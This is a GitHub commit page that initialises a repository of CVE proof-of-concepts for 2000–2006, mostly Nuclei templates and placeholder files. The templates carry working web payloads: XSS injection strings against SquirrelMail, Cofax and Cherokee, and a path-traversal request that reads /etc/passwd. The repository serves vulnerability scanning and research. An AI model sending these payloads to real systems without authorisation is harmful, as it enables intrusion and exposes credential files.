Skip to content

Commit

Permalink
init
Browse files Browse the repository at this point in the history
  • Loading branch information
cckuailong committed Dec 7, 2021
1 parent 3d8e97c commit 5235599
Show file tree
Hide file tree
Showing 7,856 changed files with 81,426 additions and 1 deletion.
The diff you're trying to view is too large. We only load the first 3000 changed files.
2 changes: 2 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
script/
CVE-2021-41773/
1 change: 1 addition & 0 deletions 2000/CVE-2000-0114/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
27 changes: 27 additions & 0 deletions 2000/CVE-2000-0114/poc/nuclei/CVE-2000-0114.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CVE-2000-0114

info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft

requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "_vti_bin/shtml.dll"
1 change: 1 addition & 0 deletions 2000/CVE-2000-0114/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2000/CVE-2000-0114/poc/others/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2000/CVE-2000-0114/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2000/CVE-2000-0114/poc/pocsuite3/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2000/CVE-2000-0114/poc/xray/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2000/CVE-2000-0114/vultarget/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this vultarget, thanks!
10 changes: 10 additions & 0 deletions 2000/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
# 2000

## Instructions:

1. Y --> already has poc, enjoy yourself
2. N --> wait for you to implement, thx! :heart:

| CVE | Component | Category | CVSS | Vultarget | Nuclei | Xray | pocsuite2 | pocsuite3 | goby | oneliner | others |
|-----|-----------|----------|------|-----------|--------|------|-----------|-----------|------|----------|-------|
| CVE-2000-0114 | | 未知 | | N | [Y](CVE-2000-0114/poc/nuclei/) | N | N | N | N | N | N |
1 change: 1 addition & 0 deletions 2001/CVE-2001-1473/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
25 changes: 25 additions & 0 deletions 2001/CVE-2001-1473/poc/nuclei/CVE-2001-1473.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2001-1473

info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310

network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-1"
1 change: 1 addition & 0 deletions 2001/CVE-2001-1473/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2001/CVE-2001-1473/poc/others/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2001/CVE-2001-1473/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2001/CVE-2001-1473/poc/pocsuite3/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2001/CVE-2001-1473/poc/xray/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2001/CVE-2001-1473/vultarget/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this vultarget, thanks!
10 changes: 10 additions & 0 deletions 2001/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
# 2001

## Instructions:

1. Y --> already has poc, enjoy yourself
2. N --> wait for you to implement, thx! :heart:

| CVE | Component | Category | CVSS | Vultarget | Nuclei | Xray | pocsuite2 | pocsuite3 | goby | oneliner | others |
|-----|-----------|----------|------|-----------|--------|------|-----------|-----------|------|----------|-------|
| CVE-2001-1473 | | 加密问题 | | N | [Y](CVE-2001-1473/poc/nuclei/) | N | N | N | N | N | N |
1 change: 1 addition & 0 deletions 2002/CVE-2002-1131/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
35 changes: 35 additions & 0 deletions 2002/CVE-2002-1131/poc/nuclei/CVE-2002-1131.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2002-1131

info:
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/21811
tags: xss,squirrelmail,cve,cve2002

requests:
- method: GET
path:
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"

- type: word
part: header
words:
- "text/html"
1 change: 1 addition & 0 deletions 2002/CVE-2002-1131/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2002/CVE-2002-1131/poc/others/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[https://www.exploit-db.com/exploits/21811](https://www.exploit-db.com/exploits/21811)
1 change: 1 addition & 0 deletions 2002/CVE-2002-1131/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2002/CVE-2002-1131/poc/pocsuite3/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2002/CVE-2002-1131/poc/xray/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2002/CVE-2002-1131/vultarget/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this vultarget, thanks!
10 changes: 10 additions & 0 deletions 2002/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
# 2002

## Instructions:

1. Y --> already has poc, enjoy yourself
2. N --> wait for you to implement, thx! :heart:

| CVE | Component | Category | CVSS | Vultarget | Nuclei | Xray | pocsuite2 | pocsuite3 | goby | oneliner | others |
|-----|-----------|----------|------|-----------|--------|------|-----------|-----------|------|----------|-------|
| CVE-2002-1131 | SquirrelMail | 输入验证 | | N | [Y](CVE-2002-1131/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2002-1131/poc/others/) |
1 change: 1 addition & 0 deletions 2004/CVE-2004-0519/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
30 changes: 30 additions & 0 deletions 2004/CVE-2004-0519/poc/nuclei/CVE-2004-0519.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2004-0519

info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2004,cve

requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"

- type: word
part: header
words:
- "text/html"
1 change: 1 addition & 0 deletions 2004/CVE-2004-0519/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2004/CVE-2004-0519/poc/others/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[https://www.exploit-db.com/exploits/24068](https://www.exploit-db.com/exploits/24068)
1 change: 1 addition & 0 deletions 2004/CVE-2004-0519/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2004/CVE-2004-0519/poc/pocsuite3/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2004/CVE-2004-0519/poc/xray/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2004/CVE-2004-0519/vultarget/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this vultarget, thanks!
10 changes: 10 additions & 0 deletions 2004/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
# 2004

## Instructions:

1. Y --> already has poc, enjoy yourself
2. N --> wait for you to implement, thx! :heart:

| CVE | Component | Category | CVSS | Vultarget | Nuclei | Xray | pocsuite2 | pocsuite3 | goby | oneliner | others |
|-----|-----------|----------|------|-----------|--------|------|-----------|-----------|------|----------|-------|
| CVE-2004-0519 | SquirrelMail | 跨站脚本 | | N | [Y](CVE-2004-0519/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2004-0519/poc/others/) |
1 change: 1 addition & 0 deletions 2005/CVE-2005-2428/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
25 changes: 25 additions & 0 deletions 2005/CVE-2005-2428/poc/nuclei/CVE-2005-2428.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2005-2428
info:
name: CVE-2005-2428
author: CasperGN
severity: medium
tags: cve,cve2005
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495

requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
1 change: 1 addition & 0 deletions 2005/CVE-2005-2428/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
3 changes: 3 additions & 0 deletions 2005/CVE-2005-2428/poc/others/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
[https://github.com/schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit](https://github.com/schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit)
[https://www.exploit-db.com/exploits/3302](https://www.exploit-db.com/exploits/3302)
[https://www.exploit-db.com/exploits/39495](https://www.exploit-db.com/exploits/39495)
1 change: 1 addition & 0 deletions 2005/CVE-2005-2428/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-2428/poc/pocsuite3/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-2428/poc/xray/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-2428/vultarget/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-4385/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
26 changes: 26 additions & 0 deletions 2005/CVE-2005-4385/poc/nuclei/CVE-2005-4385.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
id: CVE-2005-4385

info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005

requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"
1 change: 1 addition & 0 deletions 2005/CVE-2005-4385/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-4385/poc/others/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[https://www.exploit-db.com/exploits/26879](https://www.exploit-db.com/exploits/26879)
1 change: 1 addition & 0 deletions 2005/CVE-2005-4385/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-4385/poc/pocsuite3/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-4385/poc/xray/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2005/CVE-2005-4385/vultarget/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this vultarget, thanks!
11 changes: 11 additions & 0 deletions 2005/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
# 2005

## Instructions:

1. Y --> already has poc, enjoy yourself
2. N --> wait for you to implement, thx! :heart:

| CVE | Component | Category | CVSS | Vultarget | Nuclei | Xray | pocsuite2 | pocsuite3 | goby | oneliner | others |
|-----|-----------|----------|------|-----------|--------|------|-----------|-----------|------|----------|-------|
| CVE-2005-2428 | | 设计错误 | | N | [Y](CVE-2005-2428/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2005-2428/poc/others/) |
| CVE-2005-4385 | | 跨站脚本 | | N | [Y](CVE-2005-4385/poc/nuclei/) | N | N | N | N | N | [Y](CVE-2005-4385/poc/others/) |
1 change: 1 addition & 0 deletions 2006/CVE-2006-1681/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
30 changes: 30 additions & 0 deletions 2006/CVE-2006-1681/poc/nuclei/CVE-2006-1681.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2006-1681

info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006

requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"

- type: word
part: header
words:
- text/html
1 change: 1 addition & 0 deletions 2006/CVE-2006-1681/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2006/CVE-2006-1681/poc/others/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2006/CVE-2006-1681/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2006/CVE-2006-1681/poc/pocsuite3/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2006/CVE-2006-1681/poc/xray/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2006/CVE-2006-1681/vultarget/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this vultarget, thanks!
1 change: 1 addition & 0 deletions 2006/CVE-2006-2842/poc/goby/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
25 changes: 25 additions & 0 deletions 2006/CVE-2006-2842/poc/nuclei/CVE-2006-2842.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2006-2842

info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve

requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
1 change: 1 addition & 0 deletions 2006/CVE-2006-2842/poc/oneliner/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
1 change: 1 addition & 0 deletions 2006/CVE-2006-2842/poc/others/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[https://www.exploit-db.com/exploits/27948](https://www.exploit-db.com/exploits/27948)
1 change: 1 addition & 0 deletions 2006/CVE-2006-2842/poc/pocsuite2/wait_to_be_added
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Please contibute to implement this poc / vultarget, thanks!
Loading

0 comments on commit 5235599

Please sign in to comment.